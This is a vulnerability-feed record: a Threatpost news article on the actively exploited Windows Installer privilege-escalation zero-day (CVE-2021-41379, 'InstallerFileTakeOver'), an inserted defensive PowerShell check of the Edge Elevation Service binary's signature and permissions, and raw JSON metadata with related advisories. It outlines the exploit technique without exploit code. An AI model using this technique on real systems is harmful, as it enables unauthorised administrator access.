Attackers Actively Target Windows Installer Zero-Day
2021-11-24T14:09:18
ID: THREATPOST:E405927D7A8A492019D1B6552C396830 | Type: threatpost | Reporter: Elizabeth Montalbano | Modified: 2021-11-24T14:09:18
Description
Attackers are actively exploiting a Windows Installer zero-day vulnerability that was discovered when a researcher found that a patch Microsoft issued for a separate security hole inadequately fixed that original problem.
Over the weekend, security researcher Abdelhamid Naceri discovered a Windows Installer elevation-of-privilege vulnerability tracked as CVE-2021-41379 that Microsoft patched a couple of weeks ago as part of its November Patch Tuesday updates.
However, after examining the fix, Naceri found a bypass as well as an even more concerning zero-day privilege-elevation bug. The researcher posted a proof-of-concept (POC) exploit on GitHub on Tuesday for the newly discovered bug, which he said works on all currently supported versions of Windows.
If exploited, the POC, called InstallerFileTakeOver, gives an actor administrative privileges on Windows 10, Windows 11 and Windows Server when logged onto a Windows machine with Edge installed.
Peer Research Confirms Exploit and Active Attacks
Researchers at the Cisco Talos Security Intelligence and Research Group, as well as others, confirmed that the POC can be reproduced and corroborated evidence that threat actors were already exploiting the bug.
“This vulnerability affects every version of Microsoft Windows, including fully patched Windows 11 and Server 2022,” according to a post on the Cisco Talos blog by Jaeson Schultz, technical leader for Cisco Talos. “Talos has already detected malware samples in the wild that are attempting to take advantage of this vulnerability.”
Other researchers also confirmed on Twitter that the POC functions as advertised to deliver local privilege escalation.
“Can confirm this works, local priv esc,” tweeted security researcher Kevin Beaumont, who said he tested it on Windows 10 20H2 and Windows 11. “The prior patch MS issued didn’t fix the issue properly.”
Discovery and More Details
As detailed by Microsoft, CVE-2021-41379 is a Windows Installer elevation of privilege vulnerability with a rating of low on the Common Vulnerability Scoring System.
“An attacker would only be able to delete targeted files on a system,” according to Microsoft’s notes on the flaw. “They would not gain privileges to view or modify file contents.”
However, Microsoft’s patch for the bug did not fix the vulnerability correctly, allowing Naceri to bypass it during his analysis of the patch, he said in his GitHub post of the POC.
That bypass, though, was small potatoes compared with a variant of CVE-2021-41379 he discovered during the same research, one that is “more powerful than the original one,” which is why Naceri chose to publish a POC of that flaw instead, he wrote.
The code Naceri released leverages the discretionary access control list (DACL) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI file, allowing an attacker to run code as an administrator, Cisco Talos’ Schultz explained in his post.
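Because the technique described above hinges on the DACL of the Edge Elevation Service binary being loosened so that an unprivileged user can overwrite it, a defender can check both the file's Authenticode signature and who holds write rights on it. The following PowerShell is an added example written for this page; it is not code from the article, from Cisco Talos, or from the researcher's POC. It assumes the service is registered as `MicrosoftEdgeElevationService` and treats the listed built-in groups as low-privilege principals.

```powershell
# Added defender-side check (not from the article or the POC).
# Assumption: the Edge elevation service is registered under this service name.
$ServiceName = 'MicrosoftEdgeElevationService'

function Get-ServiceBinaryPath {
    param([string]$Name)
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { return $null }
    # PathName may be quoted and may carry arguments; keep only the executable.
    $path = $svc.PathName
    if ($path -match '^"([^"]+)"') { return $Matches[1] }
    return ($path -split '\s+')[0]
}

function Test-BinarySignature {
    param([string]$Path)
    $sig = Get-AuthenticodeSignature -FilePath $Path
    [pscustomobject]@{
        Path   = $Path
        Status = $sig.Status
        Signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
        Valid  = ($sig.Status -eq 'Valid')
    }
}

# Rights that let a principal replace, rewrite or re-permission the file.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::Delete -bor
               [System.Security.AccessControl.FileSystemRights]::WriteDacl -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership

# Assumption: principals a defender would normally treat as low-privilege.
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

function Get-WeakAces {
    param([string]$Path)
    $acl = Get-Acl -Path $Path
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights) -band ([int]$WriteRights)) -ne 0 -and
        $LowPrivPrincipals -contains $_.IdentityReference.Value
    }
}

$bin = Get-ServiceBinaryPath -Name $ServiceName
if (-not $bin) {
    Write-Output "Service $ServiceName not found; Edge elevation service is not installed."
    return
}

# 1. A replaced binary will no longer carry a valid Microsoft signature.
$sigInfo = Test-BinarySignature -Path $bin
$sigInfo | Format-List
if (-not $sigInfo.Valid) {
    Write-Warning "Signature on $bin is $($sigInfo.Status); investigate for file replacement."
}

# 2. Write access on the file, or on its directory, is enough to swap the file out.
foreach ($target in @($bin, (Split-Path -Parent $bin))) {
    $weak = Get-WeakAces -Path $target
    if ($weak) {
        Write-Warning "Low-privilege principals hold write rights on $target :"
        $weak | Select-Object IdentityReference, FileSystemRights, IsInherited | Format-Table -AutoSize
    } else {
        Write-Output "No low-privilege write access on $target"
    }
}
```

A clean result (valid signature, no low-privilege write ACEs) does not prove the host is unexploited; the POC can target other executables, so the same two checks are worth running over any service binary that runs as SYSTEM.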
Wait for the Patch
The associated POC works on every supported Windows installation, including Windows 11 and Server 2022 with the November 2021 patch, as well as on server installations, Naceri wrote.
“While group policy by default doesn’t allow standard users to do any MSI operation, the administrative install feature thing seems to be completely bypassing group policy,” he wrote.
Due to the “complexity” of the vulnerability, Naceri said that the best workaround available for the flaw at this time “is to wait Microsoft to release a security patch.
“Any attempt to patch the binary directly will break Windows installer,” he wrote, adding that those affected should “wait and see how Microsoft will screw the patch again” before taking any mitigation action.
A Microsoft spokesperson told BleepingComputer that the company is aware of Naceri’s disclosure and “will do what is necessary” to keep customers “safe and protected,” according to a published report.
“An attacker using the methods described must already have access and the ability to run code on a target victim’s machine,” the spokesperson said, according to the report.
Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost for “An Intro to OSquery and CloudQuery,” an on-demand Town Hall with Eric Kaiser, Uptycs’ senior security engineer, and find out how this open-source tool can help tame security across your organization’s entire campus.
{"id": "THREATPOST:E405927D7A8A492019D1B6552C396830", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Attackers Actively Target Windows Installer Zero-Day", "description": "Attackers are actively exploiting a Windows Installer zero-day vulnerability that was discovered when a patch Microsoft issued for another security hole inadequately fixed the original and unrelated problem.\n\nOver the weekend, security researcher [Abdelhamid Naceri](<https://github.com/klinix5>) discovered a Windows Installer elevation-of-privilege vulnerability tracked as [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) that Microsoft [patched](<https://threatpost.com/microsoft-nov-patch-tuesday-fixes-six-zero-days-55-bugs/176143/>) a couple of weeks ago as part of its November [Patch Tuesday updates](<https://msrc.microsoft.com/update-guide/>).\n\nHowever, after examining the fix, Naceri found a bypass as well as an even more concerning zero-day privilege-elevation bug. 
The researcher posted a [proof of concept (POC) exploit](<https://github.com/klinix5/InstallerFileTakeOver>) Tuesday on GitHub for the newly discovered bug that he said works on all currently-supported versions of Windows.\n\nIf exploited, the POC, called InstallerFileTakeOver, gives an actor administration privileges in Windows 10, Windows 11 and Windows Server when logged onto a Windows machine with Edge installed.\n\n## **Peer Research Confirms Exploit and Active Attacks**\n\nResearchers at Cisco Talos Security Intelligence and Research Group as well as others confirmed the POC can be reproduced as well as corroborating evidence that threat actors were already exploiting the bug.\n\n\u201cThis vulnerability affects every version of Microsoft Windows, including fully patched Windows 11 and Server 2022,\u201d according to a [post on the Cisco Talos blog](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>) by\n\nJaeson Schultz, technical leader for Cisco Talos. \u201cTalos has already detected malware samples in the wild that are attempting to take advantage of this vulnerability.\u201d\n\nOther researchers also confirmed on Twitter that the POC functions as advertised to deliver local privilege escalation.\n\n\u201cCan confirm this works, local priv esc,\u201d [tweeted](<https://twitter.com/GossiTheDog/status/1462721449425264645?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1462721449425264645%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2021%2F11%2F23%2Fwindows_lpe%2F>) security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog>), who said he tested it on Windows 10 20H2 and Windows 11. 
\u201cThe prior patch MS issued didn\u2019t fix the issue properly.\u201d\n\n## **Discovery and More Details**\n\nAs detailed by Microsoft, CVE-2021-41379 is a Windows Installer elevation of privilege vulnerability with a rating of low on the Common Vulnerability Scoring System.\n\n\u201cAn attacker would only be able to delete targeted files on a system,\u201d according to [Microsoft\u2019s notes](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) on the flaw. \u201cThey would not gain privileges to view or modify file contents.\u201d\n\nHowever, Microsoft\u2019s patch for the bug did not fix the vulnerability correctly, allowing Naceri to bypass it during his analysis of the patch, he said in his GitHub post of the POC.\n\nHowever, that bypass was small potatoes compared to a variant of CVE-2021-41379 that he discovered during his research that is \u201cmore powerful than the original one,\u201d which is why Naceri chose to publish a POC of that flaw instead, he wrote.\n\nThe code Naceri released leverages the discretionary access control list (DACL) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI file, allowing an attacker to run code as an administrator, Cisco Talos\u2019 Schultz explained in his post.\n\n## **Wait for the Patch**\n\nThe associated POC works in every supporting windows installation, including Windows 11 and Server 2022 with the November 2021 patch, as well as in server installations, Naceri wrote.\n\n\u201cWhile group policy by default doesn\u2019t allow standard users to do any MSI operation, the administrative install feature thing seems to be completely bypassing group policy,\u201d he wrote.\n\nDue to the \u201ccomplexity\u201d of the vulnerability, Naceri said that the best workaround available for the flaw at this time \u201cis to wait Microsoft to release a security patch.\n\n\u201cAny attempt to patch the binary directly will break Windows installer,\u201d he wrote, 
adding that those affected should \u201cwait and see how Microsoft will screw the patch again\u201d before taking any mitigation action.\n\nA Microsoft spokesperson told BleepingComputer that the company is aware of Naceri\u2019s disclosure and \u201cwill do what is necessary\u201d to keep customers \u201csafe and protected,\u201d according to [a published report](<https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/>).\n\n\u201cAn attacker using the methods described must already have access and the ability to run code on a target victim\u2019s machine,\u201d the spokesperson said, according to the report.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d an on-demand Town Hall with Eric Kaiser, Uptycs\u2019 senior security engineer, and find out how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ to access the on-demand event!_**\n", "published": "2021-11-24T14:09:18", "modified": "2021-11-24T14:09:18", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.9, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://threatpost.com/attackers-target-windows-installer-bug/176558/", "reporter": "Elizabeth Montalbano", "references": ["https://github.com/klinix5", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379", "https://threatpost.com/microsoft-nov-patch-tuesday-fixes-six-zero-days-55-bugs/176143/", "https://msrc.microsoft.com/update-guide/", "https://github.com/klinix5/InstallerFileTakeOver", "https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html", "https://twitter.com/GossiTheDog/status/1462721449425264645?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1462721449425264645%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2021%2F11%2F23%2Fwindows_lpe%2F", "https://twitter.com/GossiTheDog", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379", "https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/", "https://bit.ly/3wf2vTP", "https://bit.ly/3wf2vTP"], "cvelist": ["CVE-2021-24084", "CVE-2021-41379"], "immutableFields": [], "lastseen": "2021-11-30T01:40:15", "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "cve", "idList": ["CVE-2021-24084", "CVE-2021-41379"]}, {"type": "githubexploit", "idList": ["291894F9-38D4-5877-8B8F-EF46C6D23B82", "3AA8003E-06D3-57B2-BB7E-43616295A4B7", "DF9C9272-7F4D-5362-A6BF-18A60A5E907D"]}, {"type": "hivepro", "idList": ["HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44", "HIVEPRO:810C0A801A0950878F0BC43C27E1F429"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12341", "KLA12345"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": 
"malwarebytes", "idList": ["MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8", "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5"]}, {"type": "mscve", "idList": ["MS:CVE-2021-24084", "MS:CVE-2021-41379"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_NOV_5007186.NASL", "SMB_NT_MS21_NOV_5007189.NASL", "SMB_NT_MS21_NOV_5007192.NASL", "SMB_NT_MS21_NOV_5007205.NASL", "SMB_NT_MS21_NOV_5007206.NASL", "SMB_NT_MS21_NOV_5007207.NASL", "SMB_NT_MS21_NOV_5007215.NASL", "SMB_NT_MS21_NOV_5007233.NASL", "SMB_NT_MS21_NOV_5007245.NASL", "SMB_NT_MS21_NOV_5007246.NASL", "SMB_NT_MS21_NOV_5007255.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:E5721E7C94293776737FD29EE61C94E2", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1"]}, {"type": "thn", "idList": ["THN:48C46A645A455217EADCA99ECBFB18B8", "THN:BABD510622DAA320F3F1F55EEDD7549A"]}, {"type": "threatpost", "idList": ["THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80"]}, {"type": "zdi", "idList": ["ZDI-21-1308", "ZDI-21-178"]}]}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "cve", "idList": ["CVE-2021-24084"]}, {"type": "githubexploit", "idList": ["3AA8003E-06D3-57B2-BB7E-43616295A4B7"]}, {"type": "hivepro", "idList": ["HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12341", "KLA12345"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8"]}, {"type": "mscve", "idList": ["MS:CVE-2021-24084"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL"]}, {"type": "rapid7blog", 
"idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44"]}, {"type": "thn", "idList": ["THN:48C46A645A455217EADCA99ECBFB18B8"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:BF445076196AE435921E0B3C4AA3CE5C", "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80"]}, {"type": "zdi", "idList": ["ZDI-21-178"]}]}, "exploitation": null, "vulnersScore": 6.1}, "_state": {"dependencies": 1647589307, "score": 0}}
{"thn": [{"lastseen": "2022-05-09T12:37:52", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be 
upgraded to local privilege escalation if you know which files to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. 
Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-30T09:11:00", "type": "thn", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": 
"NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "modified": "2021-12-03T03:42:06", "id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEixE9g-lXbfi04ffXtXrVqyoSpB_rf6Xn-3UD4qDKdyKWD2TaCbvUtbUMmIbDUiMA3xnT8OdE411V7_fx1D1kuieTuYdHoVsC1SoBl69hpqZkwOnyA6NrQdijQkPLyKGgpd3Umvvds1Cw76DTRtk-jYcUcMS7l6HHe68rkzx4pI16PGnMHYxy04yi1U>)\n\nAttackers are actively making efforts to exploit a new variant of a recently disclosed privilege escalation vulnerability to potentially execute arbitrary code on fully-patched systems, once again demonstrating how adversaries move quickly to weaponize a publicly available exploit.\n\nCisco Talos [disclosed](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>) that it \"detected malware samples in the wild that are attempting to take advantage of this vulnerability.\"\n\nTracked as [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) and discovered by security researcher Abdelhamid Naceri, the elevation of privilege flaw affecting the Windows Installer software component was originally resolved as part of Microsoft's [Patch Tuesday updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) for November 2021.\n\nHowever, in what's a case of an insufficient patch, Naceri found that it was not only possible to bypass the fix implemented by Microsoft but also [achieve](<https://twitter.com/wdormann/status/1462607586272976901>) local privilege escalation via a newly discovered zero-day 
bug.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgAfxkfmkohSpEjMhQZH5LNqwQ1pen7O9L6K2QMRFBjQt_93j5vdXaqk25vj1EgZFyrSPMKMbPL_H_4wzzfmo8AD1z11O900nY3rqYMjhBmVpXrXb-PnYDbp3RrkfeTpctYgyD4wSlXli4azzDxKLTfqLL2Qqs-uPTjf7HbPXJTwIniEqWf1DChqwZW>)\n\nThe proof-of-concept (PoC) exploit, dubbed \"[InstallerFileTakeOver](<https://github.com/klinix5/InstallerFileTakeOver>),\" works by overwriting the discretionary access control list ([DACL](<https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists>)) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI installer file, allowing an attacker to run code with SYSTEM privileges.\n\nAn attacker with admin privileges could then abuse the access to gain full control over the compromised system, including the ability to download additional software, and modify, delete, or exfiltrate sensitive information stored in the machine.\n\n\"Can confirm this works, local priv esc. Tested on Windows 10 20H2 and Windows 11. The prior patch MS issued didn't fix the issue properly,\" [tweeted](<https://twitter.com/GossiTheDog/status/1462721449425264645>) security researcher Kevin Beaumont, corroborating the findings.\n\nNaceri noted that the latest variant of CVE-2021-41379 is \"more powerful than the original one,\" and that the best course of action would be to wait for Microsoft to release a security patch for the problem \"due to the complexity of this vulnerability.\"\n\n\"We are aware of the disclosure and will do what is necessary to keep our customers safe and protected,\" a Microsoft spokesperson told The Hacker News via email. 
\"An attacker using the methods described must already have access and the ability to run code on a target victim's machine.\"\n\n**_Update:_** 0patch has issued a free micropatch to remediate the \"InstallerFileTakeOver\" zero-day flaw in Windows Installer component that could be abused by a local unprivileged user to overwrite an existing system executable and then arbitrarily change its contents to gain SYSTEM permissions.\n\n\"It doesn't take a lot of imagination to see that taking over an executable file that is being used by a privileged process can get one's code executed with such process' privileges,\" 0patch's Mitja Kolsek [said](<https://blog.0patch.com/2021/12/free-micropatches-for.html>) in a write-up published Thursday.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T08:10:00", "type": "thn", "title": "Warning \u2014 Hackers Exploiting New Windows Installer Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-12-03T03:42:18", "id": "THN:48C46A645A455217EADCA99ECBFB18B8", "href": "https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2021-12-14T21:19:15", "description": "Windows Mobile Device Management Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Mobile Device Management Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-24084", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-12-06T18:18:03", "description": "Windows Installer Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 
